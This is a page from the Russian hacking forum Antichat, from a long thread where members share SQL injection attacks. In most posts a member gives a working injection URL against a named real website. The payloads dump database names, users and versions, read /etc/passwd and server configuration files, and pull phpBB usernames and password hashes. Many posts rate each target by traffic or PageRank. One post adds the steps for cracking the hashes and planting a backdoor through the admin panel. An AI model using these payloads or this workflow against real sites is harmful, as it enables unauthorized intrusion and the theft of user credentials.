HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1509 из 1604 « Первая < 5091009140914591499 1505 1506 1507 1508 1509 1510 1511 1512 1513 15191559 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15081  
Старый 12.06.2012, 13:02
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Код:
Code:
http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x7777776c6f6d6261726430317275)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--+
User: lombard0@fe56.hc.ru

Database: wwwlombard01ru

Version: 5.1.58-log

PR - 4

CY - 140
 
Ответить с цитированием

  #15082  
Старый 12.06.2012, 21:26
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
ТИЦ == 10, PR == 4, AR ==11,040, трафф.

Число зарегистрированных пользователей сайта == 50674

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+users--+h[/COLOR][/COLOR] 
Число зарегистрированных пользователей форума == 48040

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+_vb_user--+h[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15083  
Старый 13.06.2012, 10:24
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от Grifon  
Grifon said:
обнаружил инъекцию по адресу http://www.azalsigorta.com/?mod=pages' но при попытке внедрения кода срабатывают фильтры как можно их обойти?
Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:

Код:
Code:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
Результат:

Код:
Code:
root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin
....
Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7061737377 64 это ../../../../../etc/passwd.

UPD.

Код:
Code:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
В самом низу

Код:
Code:
Fatal error: Class '5.5.23-55' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
Удачи!
 
Ответить с цитированием

  #15084  
Старый 13.06.2012, 20:53
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
PR == 4;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h[/COLOR][/COLOR] 
PR == 3;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15085  
Старый 14.06.2012, 18:31
dutch
Guest
Сообщений: n/a
Провел на форуме:
369

Репутация: 0
По умолчанию
тИЦ == 10

PR == 1

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT(table_name,0x0a)+from+information_schema. tables+--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15086  
Старый 14.06.2012, 19:17
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0--[/COLOR][/COLOR] 
User: azbukasz_ubytok@localhost

Database: azbukasz_ubytok

Version: 5.1.58

PR - 2

CY - 30

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),rand(0)|0,64)+having+avg(0)--+[/COLOR][/COLOR] 
User: bankrot@localhost

Database: bankrot

Version: 5.0.95

PR - 4

CY - 50
 
Ответить с цитированием

  #15087  
Старый 15.06.2012, 07:35
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat(version(),floor(rand(0)|0 ))x+from+information_schema.tables+group+by+2)a+wh ere(1=1)



http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat((select+concat_ws(0x3a,us ername,user_password)from+phpbb_users+limit+1,1),f loor(rand(0)|0))x+from+information_schema.tables+g roup+by+2)a+where(1=1)
  1. Login:md5 —> расшифровываем
  2. Админка: /admin/
  3. Делаем ретрив бд
  4. Получаем бекдор в профиле


PR: 5

Pages: 4 430 000

CY: 425

Pages: 379 000

DMOZ: Y

Траф: 54 000
 
Ответить с цитированием

  #15088  
Старый 16.06.2012, 12:16
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
украинский датинг, жаль народа мало:

Цитата:
Сообщение от None  
http://www.interduet.com/indexcont.php?ptravel=1%27+and+1=2+UnIon+selECt+1, 2,3,4,5,count%28*%29,version%28%29,8+from+user/*
 
Ответить с цитированием

  #15089  
Старый 17.06.2012, 01:41
eregis
Guest
Сообщений: n/a
Провел на форуме:
28145

Репутация: -5
По умолчанию
Код HTML:
HTML:
http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_name+separator+0x3C62723E),9,10,11+from+information_schema.schemata--
Bases:

information_schema

allrecords

autonews

avtobang

avtobudget

avtoclubber

avtogramma

avtokarton

basket-team

basketblog

biatlonblog

bombnews

club

dating

doyouknow

engfootball

engfutbolist

epigraf

flagi

flashgames

footballblog

francefoot

francefootball

gerfoot

gerfootball

incognita

ingectors

italfoot

italyfootball

kinofreaks

kinopazl

kzu

lyrics

memorygame

netnewsmaker

nobel

poller

relaxat

rossfoot

rusfootball

spainfoot

spainfootball

sportemblem

sportnews

trenerchgk

turkfootball

twichange

ukrfoot

ukrfootball

viktorina

Мне не интересны..
 
Ответить с цитированием

  #15090  
Старый 17.06.2012, 02:36
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию
etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(use r(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+limit+1,1--

nzho.ru/catalog.php?id=137+union+select+1,concat(user(),ve rsion()),3,4,5+limit+1,1--

wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),v ersion())+LIMIT+1,1--

operalane.com/shop.php?item_id=15+union+select+1,(user(),version ()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--

www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28 %29,version%28%29%29,2,3,4+LIMIT+1,1--
 
Ответить с цитированием
Ответ
Страница 1509 из 1604 « Первая < 5091009140914591499 1505 1506 1507 1508 1509 1510 1511 1512 1513 15191559 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ